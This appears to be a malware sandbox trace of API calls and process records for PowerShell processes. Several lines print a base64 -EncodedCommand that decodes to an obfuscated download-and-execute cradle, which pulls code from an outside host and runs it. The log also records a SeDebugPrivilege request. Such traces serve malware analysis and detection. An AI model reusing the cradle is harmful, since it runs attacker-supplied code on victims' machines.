	[0877.230] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1b839040
	[0877.231] FindNextFileW (in: hFindFile=0x1b839040, lpFindFileData=0x1c98df30 | out: lpFindFileData=0x1c98df30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0877.231] FindClose (in: hFindFile=0x1b839040 | out: hFindFile=0x1b839040) returned 1
	[0877.231] SetErrorMode (uMode=0x1) returned 0x1
	[0877.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c98e040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0877.232] SetErrorMode (uMode=0x1) returned 0x1
	[0877.232] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c98e250 | out: lpFileInformation=0x1c98e250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0877.232] SetErrorMode (uMode=0x1) returned 0x1
	[0877.234] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0877.234] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0877.234] CoTaskMemFree (pv=0x2a6cc0) 
	[0877.235] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0877.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0877.236] CoTaskMemFree (pv=0x2a6cc0) 
	[0877.239] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0877.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0877.239] CoTaskMemFree (pv=0x2a6cc0) 
	[0877.972] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0877.972] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0877.972] CoTaskMemFree (pv=0x2a6cc0) 
	[0877.993] CoTaskMemAlloc (cb=0x3b) returned 0x1b86c330
	[0877.993] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c98e438, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c98e438) returned 0x4550
	[0877.996] CoTaskMemFree (pv=0x1b86c330) 
	[0878.000] GetConsoleWindow () returned 0x104ac
	[0878.011] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0878.011] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0878.011] CoTaskMemFree (pv=0x2a6cc0) 
	[0878.012] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0878.013] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0878.013] CoTaskMemFree (pv=0x2a6cc0) 
	[0879.550] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0879.550] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0879.550] CoTaskMemFree (pv=0x2a6cc0) 
	[0879.552] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c98e480 | out: pNumArgs=0x1c98e480) returned 0x26f040*=""
	[0879.556] lstrlenW (lpString="-EncodedCommand") returned 15
	[0879.557] CoTaskMemAlloc (cb=0x22) returned 0x1b864ad0
	[0879.557] RtlMoveMemory (in: Destination=0x1b864ad0, Source=0x26f062, Length=0x20 | out: Destination=0x1b864ad0) 
	[0879.557] CoTaskMemFree (pv=0x1b864ad0) 
	[0879.557] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0879.558] CoTaskMemAlloc (cb=0x2f4) returned 0x1b852b30
	[0879.558] RtlMoveMemory (in: Destination=0x1b852b30, Source=0x26f082, Length=0x2f2 | out: Destination=0x1b852b30) 
	[0879.558] CoTaskMemFree (pv=0x1b852b30) 
	[0879.559] LocalFree (hMem=0x26f040) returned 0x0
	[0879.559] CoTaskMemAlloc (cb=0x804) returned 0x1b872f40
	[0879.559] GetConsoleTitleW (in: lpConsoleTitle=0x1b872f40, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0879.560] CoTaskMemFree (pv=0x1b872f40) 
	[0879.579] CoTaskMemAlloc (cb=0x38e) returned 0x26f040
	[0879.579] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c98e3e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30ff360 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x30ff360*(hProcess=0x35c, hThread=0x358, dwProcessId=0x2598, dwThreadId=0x259c)) returned 1
	[0879.598] CoTaskMemFree (pv=0x26f040) 
	[0879.599] CloseHandle (hObject=0x358) returned 1
	[0879.599] CoTaskMemAlloc (cb=0x3b) returned 0x1b86c330
	[0879.599] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c98e488, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c98e488) returned 0x4550
	[0879.600] CoTaskMemFree (pv=0x1b86c330) 
	[0879.603] GetCurrentProcess () returned 0xffffffffffffffff
	[0879.603] GetCurrentProcess () returned 0xffffffffffffffff
	[0879.604] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x35c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c98e568, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c98e568*=0x358) returned 1

Process:
	id = "80"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x20747000"
	os_pid = "0xef4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "20"
	os_parent_pid = "0x85c"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 368
	os_tid = 0x784


Thread:
	id = 416
	os_tid = 0x106c


Thread:
	id = 420
	os_tid = 0x107c


Process:
	id = "81"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x76c7e000"
	os_pid = "0x7f4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "16"
	os_parent_pid = "0x890"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 369
	os_tid = 0x724

	[0353.893] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0562.301] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0567.630] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0567.631] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0567.631] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0567.631] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0582.312] GetVersionExW (in: lpVersionInformation=0xedba0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedba0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0582.314] GetVersionExW (in: lpVersionInformation=0xedba0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedba0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0583.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0583.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0583.749] GetVersionExW (in: lpVersionInformation=0xed910*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xed910*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0583.750] SetErrorMode (uMode=0x1) returned 0x1
	[0583.751] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xeda70 | out: lpFileInformation=0xeda70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0583.752] SetErrorMode (uMode=0x1) returned 0x1
	[0583.756] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xedce0 | out: lpdwHandle=0xedce0) returned 0x94c
	[0583.766] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c572a0 | out: lpData=0x2c572a0) returned 1
	[0583.769] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedc58, puLen=0xedc50 | out: lplpBuffer=0xedc58*=0x2c5733c, puLen=0xedc50) returned 1
	[0583.772] lstrlenW (lpString="䅁") returned 1
	[0583.780] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xedbc8, puLen=0xedbc0 | out: lplpBuffer=0xedbc8*=0x2c57418, puLen=0xedbc0) returned 1
	[0583.781] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0583.783] CoTaskMemAlloc (cb=0x2e) returned 0x3a1c40
	[0583.783] lstrcpyW (in: lpString1=0x3a1c40, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0583.784] CoTaskMemFree (pv=0x3a1c40) 
	[0583.784] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xedbc8, puLen=0xedbc0 | out: lplpBuffer=0xedbc8*=0x2c5746c, puLen=0xedbc0) returned 1
	[0583.784] lstrlenW (lpString="System.Management.Automation") returned 28
	[0583.784] CoTaskMemAlloc (cb=0x3c) returned 0x2d9e80
	[0583.784] lstrcpyW (in: lpString1=0x2d9e80, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0583.785] CoTaskMemFree (pv=0x2d9e80) 
	[0583.785] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xedbc8, puLen=0xedbc0 | out: lplpBuffer=0xedbc8*=0x2c574c8, puLen=0xedbc0) returned 1
	[0583.785] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0583.785] CoTaskMemAlloc (cb=0x20) returned 0x39fd50
	[0583.785] lstrcpyW (in: lpString1=0x39fd50, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0583.785] CoTaskMemFree (pv=0x39fd50) 
	[0583.785] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xedbc8, puLen=0xedbc0 | out: lplpBuffer=0xedbc8*=0x2c57508, puLen=0xedbc0) returned 1
	[0583.785] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0583.785] CoTaskMemAlloc (cb=0x44) returned 0x2d9e80
	[0583.785] lstrcpyW (in: lpString1=0x2d9e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0583.785] CoTaskMemFree (pv=0x2d9e80) 
	[0583.785] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xedbc8, puLen=0xedbc0 | out: lplpBuffer=0xedbc8*=0x2c57570, puLen=0xedbc0) returned 1
	[0583.785] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0583.785] CoTaskMemAlloc (cb=0x76) returned 0x341130
	[0583.785] lstrcpyW (in: lpString1=0x341130, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0583.785] CoTaskMemFree (pv=0x341130) 
	[0583.785] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xedbc8, puLen=0xedbc0 | out: lplpBuffer=0xedbc8*=0x2c5760c, puLen=0xedbc0) returned 1
	[0583.785] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0583.785] CoTaskMemAlloc (cb=0x44) returned 0x2d9e80
	[0583.785] lstrcpyW (in: lpString1=0x2d9e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0583.785] CoTaskMemFree (pv=0x2d9e80) 
	[0583.785] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xedbc8, puLen=0xedbc0 | out: lplpBuffer=0xedbc8*=0x2c57670, puLen=0xedbc0) returned 1
	[0583.785] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0583.785] CoTaskMemAlloc (cb=0x58) returned 0x3274e0
	[0583.785] lstrcpyW (in: lpString1=0x3274e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0583.785] CoTaskMemFree (pv=0x3274e0) 
	[0583.785] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xedbc8, puLen=0xedbc0 | out: lplpBuffer=0xedbc8*=0x2c576ec, puLen=0xedbc0) returned 1
	[0583.785] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0583.785] CoTaskMemAlloc (cb=0x20) returned 0x39fd50
	[0583.786] lstrcpyW (in: lpString1=0x39fd50, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0583.786] CoTaskMemFree (pv=0x39fd50) 
	[0583.786] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xedbc8, puLen=0xedbc0 | out: lplpBuffer=0xedbc8*=0x2c57394, puLen=0xedbc0) returned 1
	[0583.786] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0583.786] CoTaskMemAlloc (cb=0x66) returned 0x39a3b0
	[0583.786] lstrcpyW (in: lpString1=0x39a3b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0583.786] CoTaskMemFree (pv=0x39a3b0) 
	[0583.786] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xedbc8, puLen=0xedbc0 | out: lplpBuffer=0xedbc8*=0x0, puLen=0xedbc0) returned 0
	[0583.786] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xedbc8, puLen=0xedbc0 | out: lplpBuffer=0xedbc8*=0x0, puLen=0xedbc0) returned 0
	[0583.786] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xedbc8, puLen=0xedbc0 | out: lplpBuffer=0xedbc8*=0x0, puLen=0xedbc0) returned 0
	[0583.786] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedb98, puLen=0xedb90 | out: lplpBuffer=0xedb98*=0x2c5733c, puLen=0xedb90) returned 1
	[0585.535] CoTaskMemAlloc (cb=0x204) returned 0x343eb0
	[0585.535] VerLanguageNameW (in: wLang=0x0, szLang=0x343eb0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0585.536] CoTaskMemFree (pv=0x343eb0) 
	[0585.536] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\", lplpBuffer=0xedbe8, puLen=0xedbe0 | out: lplpBuffer=0xedbe8*=0x2c572c8, puLen=0xedbe0) returned 1
	[0585.542] GetCurrentProcessId () returned 0x7f4
	[0585.559] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xecb10 | out: lpLuid=0xecb10*(LowPart=0x14, HighPart=0)) returned 1
	[0585.562] GetCurrentProcess () returned 0xffffffffffffffff
	[0585.562] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xecb30 | out: TokenHandle=0xecb30*=0x1d4) returned 1
	[0585.563] AdjustTokenPrivileges (in: TokenHandle=0x1d4, DisableAllPrivileges=0, NewState=0x2c5ab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0585.565] CloseHandle (hObject=0x1d4) returned 1
	[0585.569] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7f4) returned 0x1d4
	[0585.578] EnumProcessModules (in: hProcess=0x1d4, lphModule=0x2c5ab80, cb=0x200, lpcbNeeded=0xedb48 | out: lphModule=0x2c5ab80, lpcbNeeded=0xedb48) returned 1
	[0587.248] GetModuleInformation (in: hProcess=0x1d4, hModule=0x13f370000, lpmodinfo=0x2c5adf0, cb=0x18 | out: lpmodinfo=0x2c5adf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0587.249] CoTaskMemAlloc (cb=0x804) returned 0x3a8370
	[0587.249] GetModuleBaseNameW (in: hProcess=0x1d4, hModule=0x13f370000, lpBaseName=0x3a8370, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0587.249] CoTaskMemFree (pv=0x3a8370) 
	[0587.250] CoTaskMemAlloc (cb=0x804) returned 0x3a8370
	[0587.250] GetModuleFileNameExW (in: hProcess=0x1d4, hModule=0x13f370000, lpFilename=0x3a8370, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0587.251] CoTaskMemFree (pv=0x3a8370) 
	[0587.251] CloseHandle (hObject=0x1d4) returned 1
	[0587.260] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x7f4) returned 0x1d4
